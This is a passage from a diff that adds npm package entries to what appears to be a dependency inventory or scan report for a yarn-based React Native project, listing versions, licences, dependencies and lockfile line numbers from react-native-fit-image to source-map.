"react-native-fit-image", + "Identifier": { + "PURL": "pkg:npm/react-native-fit-image@1.5.5", + "UID": "8a5b2b558a357936" + }, + "Version": "1.5.5", + "Licenses": [ + "Beerware" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "prop-types@15.8.1" + ], + "Locations": [ + { + "StartLine": 9001, + "EndLine": 9006 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "react-native-iphone-x-helper@1.3.1", + "Name": "react-native-iphone-x-helper", + "Identifier": { + "PURL": "pkg:npm/react-native-iphone-x-helper@1.3.1", + "UID": "a81846ff8c8fc97" + }, + "Version": "1.3.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 9079, + "EndLine": 9082 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "react-native-is-edge-to-edge@1.3.1", + "Name": "react-native-is-edge-to-edge", + "Identifier": { + "PURL": "pkg:npm/react-native-is-edge-to-edge@1.3.1", + "UID": "dcda34bc3b0b123c" + }, + "Version": "1.3.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 9084, + "EndLine": 9087 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "react-native-quick-base64@2.2.2", + "Name": "react-native-quick-base64", + "Identifier": { + "PURL": "pkg:npm/react-native-quick-base64@2.2.2", + "UID": "5285b07c55e6d94d" + }, + "Version": "2.2.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 9203, + "EndLine": 9206 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "react-refresh@0.14.2", + "Name": "react-refresh", + "Identifier": { + "PURL": "pkg:npm/react-refresh@0.14.2", + "UID": "87dab16e1be86a34" + }, + "Version": "0.14.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 9436, + "EndLine": 9439 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "read@4.1.0", + "Name": "read", + "Identifier": { + "PURL": "pkg:npm/read@4.1.0", + "UID": "98fede5716931a49" + }, + "Version": "4.1.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "mute-stream@2.0.0" + ], + "Locations": [ + { + "StartLine": 9476, + "EndLine": 9479 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "read-cmd-shim@5.0.0", + "Name": "read-cmd-shim", + "Identifier": { + "PURL": "pkg:npm/read-cmd-shim@5.0.0", + "UID": "324673a16350e322" + }, + "Version": "5.0.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 9454, + "EndLine": 9455 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "read-pkg@5.2.0", + "Name": "read-pkg", + "Identifier": { + "PURL": "pkg:npm/read-pkg@5.2.0", + "UID": "673f1529e529b187" + }, + "Version": "5.2.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@types/normalize-package-data@2.4.4", + "normalize-package-data@2.5.0", + "parse-json@5.2.0", + "type-fest@0.6.0" + ], + "Locations": [ + { + "StartLine": 9466, + "EndLine": 9474 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "read-pkg-up@7.0.1", + "Name": "read-pkg-up", + "Identifier": { + "PURL": "pkg:npm/read-pkg-up@7.0.1", + "UID": "279e42704ede523" + }, + "Version": "7.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "find-up@4.1.0", + "read-pkg@5.2.0", + "type-fest@0.8.1" + ], + "Locations": [ + { + "StartLine": 9457, + "EndLine": 9464 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "readable-stream@2.3.8", + "Name": "readable-stream", + "Identifier": { + "PURL": "pkg:npm/readable-stream@2.3.8", + "UID": "ba01f38976b499f" + }, + "Version": "2.3.8", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "core-util-is@1.0.3", + "inherits@2.0.4", + "isarray@1.0.0", + "process-nextick-args@2.0.1", + "safe-buffer@5.1.2", + "string_decoder@1.1.1", + "util-deprecate@1.0.2" + ], + "Locations": [ + { + "StartLine": 9481, + "EndLine": 9492 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "readable-stream@3.6.2", + "Name": "readable-stream", + "Identifier": { + "PURL": "pkg:npm/readable-stream@3.6.2", + "UID": "807dd25de15c63a9" + }, + "Version": "3.6.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "inherits@2.0.4", + "string_decoder@1.3.0", + "util-deprecate@1.0.2" + ], + "Locations": [ + { + "StartLine": 9494, + "EndLine": 9501 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "readable-stream@4.7.0", + "Name": "readable-stream", + "Identifier": { + "PURL": "pkg:npm/readable-stream@4.7.0", + "UID": "f40ffa40de1a0829" + }, + "Version": "4.7.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "abort-controller@3.0.0", + "buffer@6.0.3", + "events@3.3.0", + "process@0.11.10", + "string_decoder@1.3.0" + ], + "Locations": [ + { + "StartLine": 9503, + "EndLine": 9512 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "redent@3.0.0", + "Name": "redent", + "Identifier": { + "PURL": "pkg:npm/redent@3.0.0", + "UID": "9af2ff9c51627afb" + }, + "Version": "3.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "indent-string@4.0.0", + "strip-indent@3.0.0" + ], + "Locations": [ + { + "StartLine": 9514, + "EndLine": 9520 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "regenerate@1.4.2", + "Name": "regenerate", + "Identifier": { + "PURL": "pkg:npm/regenerate@1.4.2", + "UID": "68db19ac664e287b" + }, + "Version": "1.4.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 9548, + "EndLine": 9551 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "regenerate-unicode-properties@10.2.2", + "Name": "regenerate-unicode-properties", + "Identifier": { + "PURL": "pkg:npm/regenerate-unicode-properties@10.2.2", + "UID": "bbe46c5b19fd960b" + }, + "Version": "10.2.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "regenerate@1.4.2" + ], + "Locations": [ + { + "StartLine": 9541, + "EndLine": 9546 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "regenerator-runtime@0.13.11", + "Name": "regenerator-runtime", + "Identifier": { + "PURL": "pkg:npm/regenerator-runtime@0.13.11", + "UID": "43c696047f039d29" + }, + "Version": "0.13.11", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 9553, + "EndLine": 9556 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "regexpu-core@6.4.0", + "Name": "regexpu-core", + "Identifier": { + "PURL": "pkg:npm/regexpu-core@6.4.0", + "UID": "f7a333950f6a204e" + }, + "Version": "6.4.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "regenerate@1.4.2", + "regenerate-unicode-properties@10.2.2", + "regjsgen@0.8.0", + "regjsparser@0.13.0", + "unicode-match-property-ecmascript@2.0.0", + "unicode-match-property-value-ecmascript@2.2.1" + ], + "Locations": [ + { + "StartLine": 9570, + "EndLine": 9580 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "regjsgen@0.8.0", + "Name": "regjsgen", + "Identifier": { + "PURL": "pkg:npm/regjsgen@0.8.0", + "UID": "ed501d854aee866c" + }, + "Version": "0.8.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 9582, + "EndLine": 9585 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "regjsparser@0.13.0", + "Name": "regjsparser", + "Identifier": { + "PURL": "pkg:npm/regjsparser@0.13.0", + "UID": "bf1a7b21f4763bc1" + }, + "Version": "0.13.0", + "Licenses": [ + "BSD-2-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "jsesc@3.1.0" + ], + "Locations": [ + { + "StartLine": 9587, + "EndLine": 9592 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "require-directory@2.1.1", + "Name": "require-directory", + "Identifier": { + "PURL": "pkg:npm/require-directory@2.1.1", + "UID": "ff323ad4921b9829" + }, + "Version": "2.1.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 9594, + "EndLine": 9597 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "require-resolve@0.0.2", + "Name": "require-resolve", + "Identifier": { + "PURL": "pkg:npm/require-resolve@0.0.2", + "UID": "58ffc80e15bc0b46" + }, + "Version": "0.0.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "x-path@0.0.2" + ], + "Locations": [ + { + "StartLine": 9604, + "EndLine": 9609 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "reselect@4.1.8", + "Name": "reselect", + "Identifier": { + "PURL": "pkg:npm/reselect@4.1.8", + "UID": "1dfffa16058e9918" + }, + "Version": "4.1.8", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 9611, + "EndLine": 9614 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "resolve@1.22.10", + "Name": "resolve", + "Identifier": { + "PURL": "pkg:npm/resolve@1.22.10", + "UID": "ca4c0d95e889da74" + }, + "Version": "1.22.10", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "is-core-module@2.16.1", + "path-parse@1.0.7", + "supports-preserve-symlinks-flag@1.0.0" + ], + "Locations": [ + { + "StartLine": 9638, + "EndLine": 9645 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "resolve-from@4.0.0", + "Name": "resolve-from", + "Identifier": { + "PURL": "pkg:npm/resolve-from@4.0.0", + "UID": "6f018ef1fcceb075" + }, + "Version": "4.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 9623, + "EndLine": 9626 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "resolve-from@5.0.0", + "Name": "resolve-from", + "Identifier": { + "PURL": "pkg:npm/resolve-from@5.0.0", + "UID": "82b438565eabef51" + }, + "Version": "5.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 9628, + "EndLine": 9631 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "restore-cursor@3.1.0", + "Name": "restore-cursor", + "Identifier": { + "PURL": "pkg:npm/restore-cursor@3.1.0", + "UID": "8038ff2ef3550018" + }, + "Version": "3.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "onetime@5.1.2", + "signal-exit@3.0.7" + ], + "Locations": [ + { + "StartLine": 9656, + "EndLine": 9662 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "retry@0.12.0", + "Name": "retry", + "Identifier": { + "PURL": "pkg:npm/retry@0.12.0", + "UID": "6d670c056e7e4de" + }, + "Version": "0.12.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 9664, + "EndLine": 9667 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "reusify@1.1.0", + "Name": "reusify", + "Identifier": { + "PURL": "pkg:npm/reusify@1.1.0", + "UID": "6eec8961025e0938" + }, + "Version": "1.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 9669, + "EndLine": 9672 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "rimraf@3.0.2", + "Name": "rimraf", + "Identifier": { + "PURL": "pkg:npm/rimraf@3.0.2", + "UID": "74d1d3dc65533efc" + }, + "Version": "3.0.2", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "glob@7.2.3" + ], + "Locations": [ + { + "StartLine": 9674, + "EndLine": 9679 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "run-parallel@1.2.0", + "Name": "run-parallel", + "Identifier": { + "PURL": "pkg:npm/run-parallel@1.2.0", + "UID": "55809e0e83a59c84" + }, + "Version": "1.2.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "queue-microtask@1.2.3" + ], + "Locations": [ + { + "StartLine": 9681, + "EndLine": 9686 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "safe-buffer@5.1.2", + "Name": "safe-buffer", + "Identifier": { + "PURL": "pkg:npm/safe-buffer@5.1.2", + "UID": "9c7c3f5f8c0f1610" + }, + "Version": "5.1.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 9704, + "EndLine": 9707 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "safe-buffer@5.2.1", + "Name": "safe-buffer", + "Identifier": { + "PURL": "pkg:npm/safe-buffer@5.2.1", + "UID": "2f4efd8b691a623f" + }, + "Version": "5.2.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 9699, + "EndLine": 9702 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "safe-regex-test@1.1.0", + "Name": "safe-regex-test", + "Identifier": { + "PURL": "pkg:npm/safe-regex-test@1.1.0", + "UID": "c69cb43e62960412" + }, + "Version": "1.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "call-bound@1.0.4", + "es-errors@1.3.0", + "is-regex@1.2.1" + ], + "Locations": [ + { + "StartLine": 9717, + "EndLine": 9724 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "safer-buffer@2.1.2", + "Name": "safer-buffer", + "Identifier": { + "PURL": "pkg:npm/safer-buffer@2.1.2", + "UID": "8019c86523a15740" + }, + "Version": "2.1.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 9726, + "EndLine": 9729 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "sax@1.4.1", + "Name": "sax", + "Identifier": { + "PURL": "pkg:npm/sax@1.4.1", + "UID": "3bfafb66187c29ff" + }, + "Version": "1.4.1", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 9731, + "EndLine": 9734 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "scheduler@0.26.0", + "Name": "scheduler", + "Identifier": { + "PURL": "pkg:npm/scheduler@0.26.0", + "UID": "b1b3b7fc194636ec" + }, + "Version": "0.26.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 9736, + "EndLine": 9739 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "semver@5.7.2", + "Name": "semver", + "Identifier": { + "PURL": "pkg:npm/semver@5.7.2", + "UID": "27157ab31a86c77" + }, + "Version": "5.7.2", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 9781, + "EndLine": 9784 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "semver@6.3.1", + "Name": "semver", + "Identifier": { + "PURL": "pkg:npm/semver@6.3.1", + "UID": "232ca63dd14de8e5" + }, + "Version": "6.3.1", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 9741, + "EndLine": 9744 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "semver@7.7.3", + "Name": "semver", + "Identifier": { + "PURL": "pkg:npm/semver@7.7.3", + "UID": "d601fc084200dd2d" + }, + "Version": "7.7.3", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 9746, + "EndLine": 9749 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "semver@7.7.4", + "Name": "semver", + "Identifier": { + "PURL": "pkg:npm/semver@7.7.4", + "UID": "9aad7ae20c731edd" + }, + "Version": "7.7.4", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 9776, + "EndLine": 9779 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "send@0.19.0", + "Name": "send", + "Identifier": { + "PURL": "pkg:npm/send@0.19.0", + "UID": "e8ffd79753025f1c" + }, + "Version": "0.19.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "debug@2.6.9", + "depd@2.0.0", + "destroy@1.2.0", + "encodeurl@1.0.2", + "escape-html@1.0.3", + "etag@1.8.1", + "fresh@0.5.2", + "http-errors@2.0.0", + "mime@1.6.0", + "ms@2.1.3", + "on-finished@2.4.1", + "range-parser@1.2.1", + "statuses@2.0.1" + ], + "Locations": [ + { + "StartLine": 9786, + "EndLine": 9803 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "serialize-error@2.1.0", + "Name": "serialize-error", + "Identifier": { + "PURL": "pkg:npm/serialize-error@2.1.0", + "UID": "b60932a30516a602" + }, + "Version": "2.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 9805, + "EndLine": 9808 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "serve-static@1.16.2", + "Name": "serve-static", + "Identifier": { + "PURL": "pkg:npm/serve-static@1.16.2", + "UID": "4a73c954bc0da5c1" + }, + "Version": "1.16.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "encodeurl@2.0.0", + "escape-html@1.0.3", + "parseurl@1.3.3", + "send@0.19.0" + ], + "Locations": [ + { + "StartLine": 9810, + "EndLine": 9818 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "set-blocking@2.0.0", + "Name": "set-blocking", + "Identifier": { + "PURL": "pkg:npm/set-blocking@2.0.0", + "UID": "961988c295c2493a" + }, + "Version": "2.0.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 9820, + "EndLine": 9823 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "set-function-length@1.2.2", + "Name": "set-function-length", + "Identifier": { + "PURL": "pkg:npm/set-function-length@1.2.2", + "UID": "73b3ffbd838f51f7" + }, + "Version": "1.2.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "define-data-property@1.1.4", + "es-errors@1.3.0", + "function-bind@1.1.2", + "get-intrinsic@1.3.0", + "gopd@1.2.0", + "has-property-descriptors@1.0.2" + ], + "Locations": [ + { + "StartLine": 9825, + "EndLine": 9835 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "setimmediate@1.0.5", + "Name": "setimmediate", + "Identifier": { + "PURL": "pkg:npm/setimmediate@1.0.5", + "UID": "2960beed2db80802" + }, + "Version": "1.0.5", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 9856, + "EndLine": 9859 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "setprototypeof@1.2.0", + "Name": "setprototypeof", + "Identifier": { + "PURL": "pkg:npm/setprototypeof@1.2.0", + "UID": "8e9655c8ea3310a8" + }, + "Version": "1.2.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 9861, + "EndLine": 9864 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "sha1-file@1.0.4", + "Name": "sha1-file", + "Identifier": { + "PURL": "pkg:npm/sha1-file@1.0.4", + "UID": "4941109a58a3ef78" + }, + "Version": "1.0.4", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 9866, + "EndLine": 9869 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "sharp@0.32.6", + "Name": "sharp", + "Identifier": { + "PURL": "pkg:npm/sharp@0.32.6", + "UID": "f58037ca37fa764e" + }, + "Version": "0.32.6", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "color@4.2.3", + "detect-libc@2.1.2", + "node-addon-api@6.1.0", + "prebuild-install@7.1.3", + "semver@7.7.3", + "simple-get@4.0.1", + "tar-fs@3.1.1", + "tunnel-agent@0.6.0" + ], + "Locations": [ + { + "StartLine": 9871, + "EndLine": 9883 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "shebang-command@2.0.0", + "Name": "shebang-command", + "Identifier": { + "PURL": "pkg:npm/shebang-command@2.0.0", + "UID": "a6e96a85e53d4593" + }, + "Version": "2.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "shebang-regex@3.0.0" + ], + "Locations": [ + { + "StartLine": 9885, + "EndLine": 9890 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "shebang-regex@3.0.0", + "Name": "shebang-regex", + "Identifier": { + "PURL": "pkg:npm/shebang-regex@3.0.0", + "UID": "5cc0e0e704e37e12" + }, + "Version": "3.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 9892, + "EndLine": 9895 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "shell-quote@1.8.3", + "Name": "shell-quote", + "Identifier": { + "PURL": "pkg:npm/shell-quote@1.8.3", + "UID": "a3a41973f080c785" + }, + "Version": "1.8.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 9897, + "EndLine": 9900 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "signal-exit@3.0.7", + "Name": "signal-exit", + "Identifier": { + "PURL": "pkg:npm/signal-exit@3.0.7", + "UID": "29e40a3f2b692bce" + }, + "Version": "3.0.7", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 9942, + "EndLine": 9945 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "signal-exit@4.1.0", + "Name": "signal-exit", + "Identifier": { + "PURL": "pkg:npm/signal-exit@4.1.0", + "UID": "6cfe89c675b09600" + }, + "Version": "4.1.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 9947, + "EndLine": 9950 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "sigstore@4.0.0", + "Name": "sigstore", + "Identifier": { + "PURL": "pkg:npm/sigstore@4.0.0", + "UID": "9ef12f5c362beaf0" + }, + "Version": "4.0.0", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@sigstore/bundle@4.0.0", + "@sigstore/core@3.0.0", + "@sigstore/protobuf-specs@0.5.0", + "@sigstore/sign@4.0.1", + "@sigstore/tuf@4.0.0", + "@sigstore/verify@3.0.0" + ], + "Locations": [ + { + "StartLine": 9952, + "EndLine": 9960 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "simple-concat@1.0.1", + "Name": "simple-concat", + "Identifier": { + "PURL": "pkg:npm/simple-concat@1.0.1", + "UID": "5c21ead75d131a82" + }, + "Version": "1.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 9962, + "EndLine": 9965 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "simple-get@4.0.1", + "Name": "simple-get", + "Identifier": { + "PURL": "pkg:npm/simple-get@4.0.1", + "UID": "990c12fcd5fb927e" + }, + "Version": "4.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "decompress-response@6.0.0", + "once@1.4.0", + "simple-concat@1.0.1" + ], + "Locations": [ + { + "StartLine": 9967, + "EndLine": 9974 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "simple-plist@1.3.1", + "Name": "simple-plist", + "Identifier": { + "PURL": "pkg:npm/simple-plist@1.3.1", + "UID": "f13f2056c8f7b407" + }, + "Version": "1.3.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "bplist-creator@0.1.0", + "bplist-parser@0.3.1", + "plist@3.1.0" + ], + "Locations": [ + { + "StartLine": 9976, + "EndLine": 9983 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "simple-swizzle@0.2.4", + "Name": "simple-swizzle", + "Identifier": { + "PURL": "pkg:npm/simple-swizzle@0.2.4", + "UID": "8bb2c2be96a66d4d" + }, + "Version": "0.2.4", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "is-arrayish@0.3.4" + ], + "Locations": [ + { + "StartLine": 9985, + "EndLine": 9990 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "sisteransi@1.0.5", + "Name": "sisteransi", + "Identifier": { + "PURL": "pkg:npm/sisteransi@1.0.5", + "UID": "471971b14db12c3b" + }, + "Version": "1.0.5", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 9992, + "EndLine": 9995 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "slash@3.0.0", + "Name": "slash", + "Identifier": { + "PURL": "pkg:npm/slash@3.0.0", + "UID": "d55ba69027e4876c" + }, + "Version": "3.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 10002, + "EndLine": 10005 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "slugify@1.6.6", + "Name": "slugify", + "Identifier": { + "PURL": "pkg:npm/slugify@1.6.6", + "UID": "70e8a165aba3c45c" + }, + "Version": "1.6.6", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 10016, + "EndLine": 10019 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "smart-buffer@4.2.0", + "Name": "smart-buffer", + "Identifier": { + "PURL": "pkg:npm/smart-buffer@4.2.0", + "UID": "93ea596c76f58bc" + }, + "Version": "4.2.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 10021, + "EndLine": 10024 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "snake-case@3.0.4", + "Name": "snake-case", + "Identifier": { + "PURL": "pkg:npm/snake-case@3.0.4", + "UID": "6441b4a24ca1a713" + }, + "Version": "3.0.4", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "dot-case@3.0.4", + "tslib@2.8.1" + ], + "Locations": [ + { + "StartLine": 10026, + "EndLine": 10032 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "socks@2.8.7", + "Name": "socks", + "Identifier": { + "PURL": "pkg:npm/socks@2.8.7", + "UID": "ceafdfb5c7a408cb" + }, + "Version": "2.8.7", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "ip-address@10.0.1", + "smart-buffer@4.2.0" + ], + "Locations": [ + { + "StartLine": 10060, + "EndLine": 10066 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "socks-proxy-agent@8.0.5", + "Name": "socks-proxy-agent", + "Identifier": { + "PURL": "pkg:npm/socks-proxy-agent@8.0.5", + "UID": "b50f1db2d7ab66b1" + }, + "Version": "8.0.5", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "agent-base@7.1.4", + "debug@4.4.3", + "socks@2.8.7" + ], + "Locations": [ + { + "StartLine": 10043, + "EndLine": 10050 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "source-map@0.5.6", + "Name": "source-map", + "Identifier": { + "PURL": "pkg:npm/source-map@0.5.6", + "UID": "bec45af3e1f49929" + }, + "Version": "0.5.6", + "Licenses": [ + "BSD-3-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 10099, + "EndLine": 10102 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "source-map@0.5.7", + "Name": "source-map", + "Identifier": { + "PURL": "pkg:npm/source-map@0.5.7", + "UID": "10d1e440eebebc49" + }, + "Version": "0.5.7", + "Licenses": [ + "BSD-3-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 10089, + "EndLine": 10092 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "source-map@0.6.1", + "Name": "source-map", + "Identifier": { + "PURL": "pkg:npm/source-map@0.6.1", + "UID": "ff8da986f19c07dd" + }, + "Version": "0.6.1", + "Licenses": [ + "BSD-3-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { 